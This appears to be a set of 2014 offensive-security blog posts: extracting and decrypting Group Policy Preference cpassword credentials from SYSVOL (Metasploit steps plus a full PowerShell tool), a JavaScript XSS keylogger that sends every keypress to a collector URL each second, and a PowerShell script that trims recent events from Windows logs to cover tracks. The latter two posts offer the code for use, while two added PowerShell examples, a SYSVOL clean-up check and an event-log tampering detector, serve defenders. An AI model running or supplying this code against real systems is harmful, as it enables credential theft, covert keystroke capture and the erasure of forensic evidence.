Tuesday 29 July 2014

Windows Gather Group Policy Preference Saved Passwords

Hi All,

Thought I would put up a post about an exploit that has been rearing its head recently. It has to do with the way Group Policy Preferences store credentials for local users and groups, services and scheduled tasks, and Microsoft tracks it as MS14-025. Now MS have done a great job of encrypting the passwords (AES-256) but a terrible job of keeping the key secret :-P... it is a single fixed key, and it is published on MSDN, so anyone who can read the preference XML can decrypt every cpassword in it. Below is a short example of how you can use the gpp post module in Metasploit to exploit this.

So this exploit was run on the DC, but it can be run from anywhere that can read SYSVOL: the preference XML lives under \\<domain>\SYSVOL\<domain>\Policies, which every authenticated domain user can read, so a plain domain user session is enough. Note also that the MS14-025 patch only stops new passwords being saved through the management console; any Groups.xml already sitting in SYSVOL keeps its cpassword until an admin removes the item. I will work on a python script soon to extract the value out of the XML file and decrypt it.

First, let's create a new user in Group Policy Preferences so there is a saved password to find.



Let's run the exploit to get a reverse handler and a Meterpreter session, run getsystem to get SYSTEM privileges, and then background the session.

 
Let's use the gpp module:
use post/windows/gather/credentials/gpp
set session 2
run

The results!
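
For anyone who wants to do the same thing without a Meterpreter session, here is an added PowerShell example (not the Metasploit module and not the script promised above) that does the two steps by hand: find every preference file under a SYSVOL Policies tree that carries a cpassword attribute, and decrypt it with the AES-256 key Microsoft published in the MS-GPPREF specification. The file names and attribute names are the ones Group Policy Preferences writes; the Groups.xml at the bottom is a constructed sample and the SYSVOL path in the usage line is a placeholder.

```powershell
# Added example: decrypt GPP cpassword values and hunt for them in SYSVOL.

function ConvertFrom-GPPCpassword {
    param([Parameter(Mandatory)][string]$Cpassword)

    # The fixed AES-256 key from MS-GPPREF 2.2.1.1.4 (the "secret" that isn't).
    $key = [byte[]](0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                    0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)

    # cpassword is Base64 with the '=' padding stripped; restore it before decoding.
    $mod = $Cpassword.Length % 4
    if ($mod -ne 0) { $Cpassword += '=' * (4 - $mod) }
    $cipherText = [Convert]::FromBase64String($Cpassword)

    # AES-256-CBC with an all-zero IV and PKCS7 padding; the plaintext is UTF-16LE.
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Key     = $key
        $aes.IV      = New-Object byte[] 16
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $plain = $aes.CreateDecryptor().TransformFinalBlock($cipherText, 0, $cipherText.Length)
        [System.Text.Encoding]::Unicode.GetString($plain)
    } finally {
        $aes.Dispose()
    }
}

function Get-GPPCredentialFromXml {
    param(
        [Parameter(Mandatory)][xml]$Doc,
        [string]$Source = '<inline>'
    )
    # Every preference type (Groups, Services, ScheduledTasks, DataSources, Drives,
    # Printers) keeps the password in a cpassword attribute on its <Properties>
    # element; only the name of the account attribute differs between types.
    foreach ($props in $Doc.SelectNodes('//*[@cpassword]')) {
        $account = ''
        foreach ($attr in 'userName', 'accountName', 'runAs', 'username') {
            if ($props.HasAttribute($attr)) { $account = $props.GetAttribute($attr); break }
        }
        [pscustomobject]@{
            File     = $Source
            Account  = $account
            NewName  = $props.GetAttribute('newName')   # Groups.xml items can also rename the account
            Password = ConvertFrom-GPPCpassword -Cpassword $props.GetAttribute('cpassword')
            Changed  = $props.ParentNode.GetAttribute('changed')
        }
    }
}

function Find-GPPPassword {
    param(
        # Root to search. In a domain this is \\<domain>\SYSVOL\<domain>\Policies,
        # which any authenticated user can read, so no DC access is required.
        [Parameter(Mandatory)][string]$Path
    )
    $names = 'Groups.xml', 'Services.xml', 'ScheduledTasks.xml', 'DataSources.xml', 'Drives.xml', 'Printers.xml'
    Get-ChildItem -Path $Path -Recurse -Include $names -ErrorAction SilentlyContinue |
        ForEach-Object {
            $content = Get-Content -Path $_.FullName -Raw
            # Skip the (common) preference files that carry no password at all.
            if ($content -match 'cpassword') {
                Get-GPPCredentialFromXml -Doc ([xml]$content) -Source $_.FullName
            }
        }
}

# Constructed sample in the shape GPMC writes for a "Local Users and Groups" item.
# The cpassword value is a sample, not taken from any real policy.
$sample = @'
<Groups>
  <User name="backupadmin" changed="2014-07-29 10:15:00" uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="U" newName="" fullName="" description="" cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="backupadmin"/>
  </User>
</Groups>
'@
Get-GPPCredentialFromXml -Doc ([xml]$sample) -Source 'sample Groups.xml' | Format-List

# Against a real domain (placeholder path):
# Find-GPPPassword -Path "\\corp.example\SYSVOL\corp.example\Policies" | Format-Table -AutoSize
```

The same functions double as a clean-up check for the defender: run Find-GPPPassword against your own SYSVOL after applying the MS14-025 update, because the update stops new passwords being saved but leaves existing ones in place.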


Thursday 17 July 2014

Keylogger XSS - Javascript

Hi All,

This is just a quick post to drop my keylogger. It buffers every keypress on the page and ships the buffer off to a collector once a second. A lot of people have these around, but I thought I would share it with all of you.

Cheers.

<script>
var keys = '';
// Buffer every printable keypress on the page
document.onkeypress = function(e) {
    var get = window.event ? event : e;                 // old IE only exposes the global event object
    var key = get.keyCode ? get.keyCode : get.charCode;
    key = String.fromCharCode(key);
    keys += key;
}
// Once a second, exfiltrate the buffer through an image request and reset it
window.setInterval(function(){
    if (keys.length === 0) return;                      // nothing typed, nothing to send
    // encode so '&', '#', '+' and friends survive the query string intact
    new Image().src = 'http://localhost/keylogger.php?c=' + encodeURIComponent(keys);
    keys = '';
}, 1000);
</script>

Tuesday 8 July 2014

Clear Event Logs After Certain Time

The script below exports everything in the Security, Application and System logs except the last two hours, kills the process hosting the Event Log service so the live .evtx files can be overwritten, copies the trimmed exports over them and then starts the service again. You can change the number of hours to clear to whatever you want. This is useful when you need to cover your tracks, with two caveats: the svchost you kill may also host other services that share it, so they go down with it, and the service restart is itself logged (System event 6005). Nothing writes a Security 1102 "audit log was cleared" event, because the log was never cleared through the API, but a defender who looks will still find a two-hour hole with a service restart at the end of it.

Open PowerShell as an administrator (THIS IS IMPORTANT)


#Remove the exported .evtx copies when done
$remove = $true
#Temporary work directory (must already exist)
$tempdir = "C:\temp"

#How many hours of logs do you want to clear. -2 drops the last two hours
$hourstoclear = -2

#Start time: every event newer than this is dropped
$start = (Get-Date).AddHours($hourstoclear)

#Get the live .evtx file locations. The values are REG_EXPAND_SZ and Get-ItemProperty expands them.
#Use CurrentControlSet: ControlSet001 is not always the control set Windows booted from.
$secloc = (Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\EventLog\Security -Name "File").File
$apploc = (Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\EventLog\Application -Name "File").File
$sysloc = (Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\EventLog\System -Name "File").File

#Age of $date in milliseconds, which is what the XPath timediff() function compares against
function GetMilliseconds ($date) {
    $ts = New-TimeSpan -Start $date -End (Get-Date)
    [math]::Round($ts.TotalMilliseconds)
} # end function
$startDate = GetMilliseconds $start

#Export everything older than $start to EVTX.
#timediff(@SystemTime) is the age of each event in milliseconds, so ">=" keeps the old events and drops the recent ones.
wevtutil epl Security "$tempdir\Security.evtx" /q:"*[System[TimeCreated[timediff(@SystemTime) >= $startDate]]]"
wevtutil epl Application "$tempdir\Application.evtx" /q:"*[System[TimeCreated[timediff(@SystemTime) >= $startDate]]]"
wevtutil epl System "$tempdir\System.evtx" /q:"*[System[TimeCreated[timediff(@SystemTime) >= $startDate]]]"

#The Event Log service will not take a normal stop, so kill the svchost that hosts it.
#Ask the service for its PID rather than matching the svchost command line, which differs between Windows versions.
$procid = (Get-WmiObject Win32_Service -Filter "Name = 'EventLog'").ProcessId
#Kill the Event Log host process (this also takes down any other services sharing that svchost)
taskkill /PID $procid /F

#Copy the trimmed exports over the live logs.
Copy-Item "$tempdir\Security.evtx" $secloc -Force
Copy-Item "$tempdir\Application.evtx" $apploc -Force
Copy-Item "$tempdir\System.evtx" $sysloc -Force

#Start Windows Event Log again
Start-Service EventLog

#Remove exports of event logs.
if ($remove -eq $true) {
    Remove-Item "$tempdir\Security.evtx"
    Remove-Item "$tempdir\Application.evtx"
    Remove-Item "$tempdir\System.evtx"
}
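
For the other side of the fence, here is an added PowerShell example (not part of the original post) that looks for the traces a log replacement like the one above leaves behind: an Event Log service start with no clean stop before it, a stretch of time in which the Security log is silent, and whether any genuine 1102 "log cleared" events exist to explain it. It assumes an elevated PowerShell on the host being examined; the gap threshold and the number of events read back are arbitrary assumptions to be tuned per host.

```powershell
# Added example: find the artifacts left by trimming and replacing a live .evtx.
function Find-EventLogTampering {
    param(
        [string]$LogName    = 'Security',   # log to examine for holes
        [int]   $GapMinutes = 60,           # silence this long is suspicious on a busy host (assumed threshold)
        [int]   $MaxEvents  = 50000         # how far back to read (assumed)
    )

    # 1. Event Log service restarts. A clean restart logs System 6006 (stopped) then
    #    6005 (started). A forced taskkill of the hosting svchost never gets the 6006
    #    written, so a 6005 with no preceding 6006 is the signature to look for.
    $svc = @(Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 6005, 6006 } -ErrorAction SilentlyContinue |
        Sort-Object TimeCreated)
    $prev = $null
    foreach ($e in $svc) {
        if ($e.Id -eq 6005 -and ($null -eq $prev -or $prev.Id -ne 6006)) {
            [pscustomobject]@{
                Finding = 'EventLogServiceStartedWithoutCleanStop'
                Start   = $e.TimeCreated
                End     = $e.TimeCreated
                Detail  = "System event 6005 at $($e.TimeCreated) has no preceding 6006"
            }
        }
        $prev = $e
    }

    # 2. Holes in the target log. The trimming script removes a window of recent events
    #    wholesale, so two consecutive surviving records straddle that window.
    #    Get-WinEvent returns newest first; sort ascending before comparing neighbours.
    $events = @(Get-WinEvent -LogName $LogName -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        Sort-Object TimeCreated)
    for ($i = 1; $i -lt $events.Count; $i++) {
        $gap = $events[$i].TimeCreated - $events[$i - 1].TimeCreated
        if ($gap.TotalMinutes -ge $GapMinutes) {
            [pscustomobject]@{
                Finding = 'GapInLog'
                Start   = $events[$i - 1].TimeCreated
                End     = $events[$i].TimeCreated
                Detail  = ("{0}: no events for {1:N0} minutes between record {2} and record {3}" -f $LogName, $gap.TotalMinutes, $events[$i - 1].RecordId, $events[$i].RecordId)
            }
        }
    }

    # 3. A real clear through the API leaves Security 1102 (and System 104). A file
    #    replacement leaves neither, so report what exists: a gap with no 1102 near it
    #    is the "trimmed, not cleared" case.
    $cleared = @(Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 1102 } -MaxEvents 5 -ErrorAction SilentlyContinue)
    foreach ($e in $cleared) {
        [pscustomobject]@{
            Finding = 'LogCleared'
            Start   = $e.TimeCreated
            End     = $e.TimeCreated
            Detail  = 'Security event 1102: the audit log was cleared'
        }
    }
}

# Usage on the host under examination:
Find-EventLogTampering -LogName Security -GapMinutes 90 | Format-Table -AutoSize
```

A gap finding on its own is weak evidence on a quiet workstation, which is why the function reports the service restart and the 1102 events alongside it; the combination of a silent window, a 6005 without a 6006 just after it, and no 1102 anywhere is what to escalate.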